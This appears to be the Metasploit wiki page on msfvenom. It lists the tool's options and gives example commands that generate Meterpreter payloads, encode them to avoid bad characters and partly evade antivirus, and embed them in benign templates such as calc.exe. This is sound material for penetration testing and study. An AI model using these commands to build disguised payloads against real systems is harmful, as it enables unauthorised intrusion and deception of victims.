How to use msfvenom

Msfvenom is the combination of payload generation and encoding. It's a replacement for msfpayload and msfencode. It supports the following options:

Options:
    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --options                    List the payload's standard options
    -v, --var-name <name>            Specify a custom variable name to use for certain output formats
    -h, --help                       Show this message
        --help-formats               List available formats

How to generate a payload

To generate a payload, you can use the -p flag. You will also most likely use the -f flag (also known as --format) to specify what the output should be. Format can be two things: either you're generating an executable type format, or you are generating a transform type format. The executable type means when you create the payload, the output is meant to be a file. The transform format means this is code, as in you probably copy and paste this to some exploit code you're working on.

The executable format is pretty straight forward, so it needs no further explanation. But there is another flag that's specifically designed for some transform formats, and that is the -v flag (--var-name). This option allows you have a custom variable name in your output, and currently only the following transform formats support --var-name: bash, c, csharp, java, perl, powershell, py, rb, sh, vbapplication, vbscript.

The following is a basic example of how to generate a file:

./msfvenom -p windows/meterpreter/bind_tcp -f exe

The -p flag also supports "-" as a way to accept a custom payload:

cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw

This is an example of setting a custom variable for a C output:

echo AAAA | ./msfvenom -p - -a x86 --platform windows -v myVar -f java

If you'd like to know all the built-in Metasploit payloads available, you can use the -l flag:

./msfvenom -l payloads

How to encode a payload

By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

To find out what encoders you can use, you can use the -l flag:

./msfvenom -l encoders

You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoiding antivirus but understand encoding isn't really meant to be used a real AV evasion solution:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3

How to avoid bad characters

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw

How to supply a custom template

By default, msfvenom uses templates from the msf/data/templates directory. If you'd like to choose your own, you can use the -x flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe

Please note: If you'd like to create a x64 payload with a custom x64 custom template for Winodws, then instead of the exe format, you should use exe-only:

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.

Metasploit Wiki Pages

Home Welcome to Metasploit!
Using Metasploit A collection of useful links for penetration testers.
Setting Up a Metasploit Development Environment From apt-get install to git push.
CONTIBUTING.md What should your contributions look like?
Landing Pull Requests Working with other people's contributions.
Using Git All about Git and GitHub.
Contributing to Metasploit Be a part of our open source community.
Meterpreter All about the Meterpreter payload.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

How to use msfvenom

Metasploit Wiki Pages

Clone this wiki locally